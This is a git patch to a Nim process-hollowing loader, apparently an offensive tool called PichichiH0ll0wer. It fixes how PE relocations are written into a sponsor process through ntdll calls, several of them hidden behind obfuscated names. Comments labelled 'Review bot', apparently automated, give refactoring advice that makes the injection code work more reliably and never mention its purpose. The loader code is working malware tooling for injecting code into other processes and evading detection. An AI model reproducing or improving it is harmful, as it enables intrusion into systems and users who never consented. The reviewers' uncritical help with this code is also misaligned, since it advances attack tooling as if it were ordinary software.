From dc1a55e32dbc24375ae676811a6bccc4d74d21bf Mon Sep 17 00:00:00 2001
From: Itay Migdal
Date: Fri, 16 Feb 2024 22:01:03 +0200
Subject: [PATCH] fixed bug in relocations
---
 PichichiH0ll0wer/Loader/hollow123.nim | 2 +-
 PichichiH0ll0wer/Loader/reloc.nim | 48 +++++++++++++--------------
 2 files changed, 24 insertions(+), 26 deletions(-)
diff --git a/PichichiH0ll0wer/Loader/hollow123.nim b/PichichiH0ll0wer/Loader/hollow123.nim
index ceb0574..8731577 100644
--- a/PichichiH0ll0wer/Loader/hollow123.nim
+++ b/PichichiH0ll0wer/Loader/hollow123.nim
@@ -139,7 +139,7 @@ proc hollow123*(peStr: string, processInfoAddress: PPROCESS_INFORMATION): bool =
 when not defined(release): echo "[*] Allocating memory in sponsor process (preferred address)"
 var newImageBaseAddress = peImageImageBase
 res = CbZGEMmsvlfsZxPo( # NtAllocateVirtualMemory
- 1, # sponsorProcessHandle,
+ sponsorProcessHandle,
 addr newImageBaseAddress,
 0,
 addr peImageSize,
diff --git a/PichichiH0ll0wer/Loader/reloc.nim b/PichichiH0ll0wer/Loader/reloc.nim
index 4cbf185..c696058 100644
--- a/PichichiH0ll0wer/Loader/reloc.nim
+++ b/PichichiH0ll0wer/Loader/reloc.nim
@@ -14,9 +14,10 @@ type BASE_RELOCATION_BLOCK {.bycopy.} = object
 type PBASE_RELOCATION_ENTRY = ptr BASE_RELOCATION_ENTRY
 type PBASE_RELOCATION_BLOCK = ptr BASE_RELOCATION_BLOCK
+proc NtReadVirtualMemory(ProcessHandle: HANDLE, BaseAddress: PVOID, Buffer: PVOID, NumberOfBytesToRead: SIZE_T, NumberOfBytesReaded: PSIZE_T): NTSTATUS {.stdcall, dynlib: protectString("ntdll"), importc.}
+
 when defined(hollow1) or defined(hollow4):
 proc NtWriteVirtualMemory(ProcessHandle: HANDLE, BaseAddress: PVOID, Buffer: PVOID, NumberOfBytesToWrite: SIZE_T, NumberOfBytesWritten: PSIZE_T): NTSTATUS {.stdcall, dynlib: protectString("ntdll"), importc.}
- proc NtReadVirtualMemory(ProcessHandle: HANDLE, BaseAddress: PVOID, Buffer: PVOID, NumberOfBytesToRead: SIZE_T, NumberOfBytesReaded: PSIZE_T): NTSTATUS {.stdcall, dynlib: protectString("ntdll"), importc.}
 when defined(hollow2) or defined(hollow5):
 include syscalls2
 when defined(hollow3) or defined(hollow6):
@@ -28,10 +29,8 @@ proc applyRelocations*(peBytesPtr: ptr byte, newImageBaseAddress: LPVOID, sponso
 var peImageSectionsHeader = cast[ptr IMAGE_SECTION_HEADER](cast[size_t](peImageNtHeaders) + sizeof(IMAGE_NT_HEADERS))
 var peImageImageBase = cast[LPVOID](peImageNtHeaders.OptionalHeader.ImageBase)
 var dwDelta = cast[DWORD](cast[int](newImageBaseAddress) - cast[int](peImageImageBase))
- if dwDelta == 0: return true
-
 for i in countUp(0, cast[int](peImageNtHeaders.FileHeader.NumberOfSections)):
 if toString(peImageSectionsHeader[i].Name) == protectString(".reloc"):
 var dwRelocAddr = peImageSectionsHeader[i].PointerToRawData
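Review bot: `NtReadVirtualMemory` is now declared unconditionally at module scope while `NtWriteVirtualMemory`, right below it, stays inside `when defined(hollow1) or defined(hollow4)`, and nothing in the hunk records why the two ntdll imports are scoped differently; a comment on the new declaration such as `# shared by every hollow variant: the read-back in applyRelocations is no longer gated` would spare the next reader from re-deriving that from the loop further down in reloc.nim. Separately, the new line keeps the parameter name `NumberOfBytesReaded`; the ntdll prototype calls it `NumberOfBytesRead`, and since the name is purely documentary on an `importc` proc, the move is the moment to spell it correctly.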
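Review bot: The `if dwDelta == 0: return true` early exit is removed with nothing in its place, so a zero delta now walks every relocation block and writes each field back unchanged rather than returning before the section scan. That may well be deliberate, but the hunk does not say so; a comment where the guard stood, e.g. `# relocations are always walked; with a zero delta the write-back is a no-op`, would stop a later maintainer from reinstating it, and if it is not deliberate the guard should come back. applyRelocations starts before and continues after this hunk, so the loop body that consumes `dwDelta` is not visible here.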
@@ -48,32 +47,31 @@ proc applyRelocations*(peBytesPtr: ptr byte, newImageBaseAddress: LPVOID, sponso
 continue
 var dwFieldAddress = pBlockheader.PageAddress + cast[DWORD](pBlocks[j].Offset)
 var dwBuffer: DWORD = 0
+ if NtReadVirtualMemory(
+ sponsorProcessHandle,
+ cast[PVOID](cast[DWORD](newImageBaseAddress) + dwFieldAddress),
+ addr dwBuffer,
+ cast[SIZE_T](sizeof(DWORD)),
+ NULL
+ ) != TRUE:
+ return false
+ dwBuffer += dwDelta
 when defined(hollow1) or defined(hollow4):
- if NtReadVirtualMemory(
- sponsorProcessHandle,
- cast[PVOID](cast[DWORD](newImageBaseAddress) + dwFieldAddress),
+ if NtWriteVirtualMemory(
+ sponsorProcessHandle,
+ cast[PVOID](cast[DWORD](newImageBaseAddress) + dwFieldAddress),
+ addr dwBuffer,
+ cast[SIZE_T](sizeof(DWORD)),
+ NULL
+ ) != TRUE:
+ return false
+ when defined(hollow2) or defined(hollow3) or defined(hollow5) or defined(hollow6):
+ if nVcnEsSyWXtfrjav(
+ sponsorProcessHandle,
+ cast[PVOID](cast[DWORD](newImageBaseAddress) + dwFieldAddress),
 addr dwBuffer,
 cast[SIZE_T](sizeof(DWORD)),
 NULL
 ) != TRUE:
 return false
- dwBuffer += dwDelta
- when defined(hollow1) or defined(hollow4):
- if NtWriteVirtualMemory(
- sponsorProcessHandle,
- cast[PVOID](cast[DWORD](newImageBaseAddress) + dwFieldAddress),
- addr dwBuffer,
- cast[SIZE_T](sizeof(DWORD)),
- NULL
- ) != TRUE:
- return false
- when defined(hollow2) or defined(hollow3) or defined(hollow5) or defined(hollow6):
- if nVcnEsSyWXtfrjav(
- sponsorProcessHandle,
- cast[PVOID](cast[DWORD](newImageBaseAddress) + dwFieldAddress),
- addr dwBuffer,
- cast[SIZE_T](sizeof(DWORD)),
- NULL
- ) != TRUE:
- return false
 return true
\ No newline at end of file
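Review bot: The target address `cast[PVOID](cast[DWORD](newImageBaseAddress) + dwFieldAddress)` is now spelled out three times in one loop body (the unconditional read and both `when` write branches), which is exactly the duplication that let the read and write paths drift apart before this commit, when the old lines only performed the read under `hollow1`/`hollow4`. Computing it once, `let fieldPtr = cast[PVOID](cast[DWORD](newImageBaseAddress) + dwFieldAddress)`, right after `var dwFieldAddress` and passing `fieldPtr` to all three calls keeps them in step. Moving the read out of the `when` block also deserves a one-line comment above it, e.g. `# the read-back is common to all variants; only the write differs per hollow mode`, since the remaining split is otherwise the first thing a reader stumbles on. applyRelocations starts outside the hunk, so the loop header and the `pBlocks`/`pBlockheader` setup are not visible here.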